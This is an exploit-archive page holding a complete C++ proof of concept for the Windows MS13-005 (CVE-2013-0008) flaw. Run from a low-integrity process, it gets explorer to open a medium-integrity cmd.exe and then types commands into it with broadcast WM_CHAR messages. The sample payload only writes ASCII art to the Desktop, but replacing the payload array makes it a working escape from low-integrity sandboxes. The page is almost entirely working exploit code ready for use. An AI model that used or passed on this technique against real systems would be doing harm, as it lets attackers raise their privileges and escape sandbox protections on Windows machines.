MS13-005 HWND_BROADCAST PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS13-005 HWND_BROADCAST PoC
# Published : 2013-02-11
# Author :
# Previous Title : IrfanView 4.33 IMXCF.DLL Plugin Code Execution
# Next Title : MySQL (Linux) Heap Based Overrun PoC Zeroday
/*
    ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL
process and message broadcasted
    Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    @taviso did all the job, I just followed its blogpost:
      -> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html
-- amazing.

    Cool trick:
      -> If you want to set this process to a low IL you can use:
      icacls ms13-005-funz-poc.exe /setintegritylevel L
      -> The new ms13-005-funz-poc.exe will be now launched as low IL
(you can check it with process explorer)

    # Exploit Title: ms13-005-funz-poc.cpp
    # Date: 2013-02-05
    # Exploit Author: 0vercl0k - https://twitter.com/0vercl0k
    # Vendor Homepage: https://www.microsoft.com/
    # Version: Windows Vista, Windows Server 2008, Windows 7, Windows
Server 2008 r2, Windows 8, Windows Server 2012, Windows RT (See
http://technet.microsoft.com/fr-fr/security/bulletin/ms13-005)
    # Tested on: Windows 7
    # CVE : CVE-2013-0008 -
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0008
    # Video: http://0vercl0k.tuxfamily.org/bl0g/ms13-005-funz/ms13-005-funz-poc.mp4
*/

#include <windows.h>
#include <stdio.h>

int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    PCHAR payload[] = {
        "echo ".___   _____    ______________ ______________   ">
%USERPROFILE%\Desktop\TROLOLOL",
        "echo "|   | /     \   \__    ___/   |   \_   _____/
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "|   |/  \ /  \    |    | /    ~    \    __)_
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "|   /    Y    \   |    | \    Y    /        \
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "|___\____|__  /   |____|  \___|_  /_______  /   ">>
%USERPROFILE%\Desktop\TROLOLOL",
        "echo "           \/                  \/        \/
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo " _______  .___  ________  ________    _____     ">>
%USERPROFILE%\Desktop\TROLOLOL",
        "echo " \      \ |   |/  _____/ /  _____/   /  _  \
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo " /   |   \|   /   \  ___/   \  ___  /  /_\  \
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "/    |    \   \    \_\  \    \_\  \/    |
\  ">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "\____|__  /___|\______  /\______  /\____|__  /
">> %USERPROFILE%\Desktop\TROLOLOL",
        "echo "       \/            \/        \/         \/
">> %USERPROFILE%\Desktop\TROLOLOL",
        "exit",
        NULL
    };

    printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy
? Press to continuen");
    getchar();

    si.cb = sizeof(si);
    CreateProcess(
        NULL,
        "cmd.exe",
        NULL,
        NULL,
        TRUE,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi
    );

    Sleep(1000);

    // Yeah, you can "bruteforce" the index of the window..
    printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
    keybd_event(VK_LWIN, 0x5B, 0, 0);
    keybd_event(VK_LSHIFT, 0xAA, 0, 0);
    keybd_event(0x37, 0x87, 0, 0);

    keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
    keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
    keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);

    Sleep(1000);
    printf("3] Killing now the useless low IL cmd.exe..n");

    TerminateProcess(
        pi.hProcess,
        1337
    );

    printf("4] Now driving the medium IL cmd.exe with SendMessage and
HWND_BROADCAST (WM_CHAR)n");
    printf("   "Drive the command prompt [..] to make it look like a
scene from a Hollywood movie." <- That's what we're going to do!n");

    for(unsigned int i = 0; payload[i] != NULL; ++i)
    {
        for(unsigned int j = 0; j < strlen(payload[i]); ++j)
        {
            // Yeah, that's the fun part to watch ;D
            Sleep(10);
            SendMessage(
                HWND_BROADCAST,
                WM_CHAR,
                payload[i][j],
                0
            );
        }

        SendMessage(
            HWND_BROADCAST,
            WM_CHAR,
            VK_RETURN,
            0
        );
    }

    return EXIT_SUCCESS;
}